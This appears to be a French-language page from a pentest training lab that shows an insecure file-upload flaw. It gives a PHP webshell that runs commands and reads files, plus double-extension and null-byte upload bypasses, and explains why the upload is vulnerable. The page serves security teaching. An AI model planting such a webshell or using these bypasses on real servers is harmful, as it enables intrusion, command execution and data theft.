File Upload - Pentest Lab

Insecure File Upload

Cette page permet d'uploader des fichiers sans validation du type ou du contenu.

Indices d'exploitation

Uploader un fichier PHP: <?php system($_GET['cmd']); ?>
Double extension: shell.php.jpg
Null byte: shell.php%00.jpg
Acceder au fichier: /uploads/vulnerable/shell.php?cmd=whoami

Upload de fichier

Fichiers uploades

Aucun fichier uploade.

Exemple de webshell PHP

Creez un fichier shell.php avec ce contenu:

<?php // Simple webshell if(isset($_GET['cmd'])) { echo '<pre>'; echo htmlspecialchars(shell_exec($_GET['cmd'])); echo '</pre>'; } if(isset($_GET['file'])) { echo '<pre>'; echo htmlspecialchars(file_get_contents($_GET['file'])); echo '</pre>'; } ?>

Pourquoi c'est vulnerable?

Aucune validation du type MIME
Aucune validation de l'extension
Aucune verification du contenu
Le fichier est stocke dans un dossier public accessible
Le nom original du fichier est conserve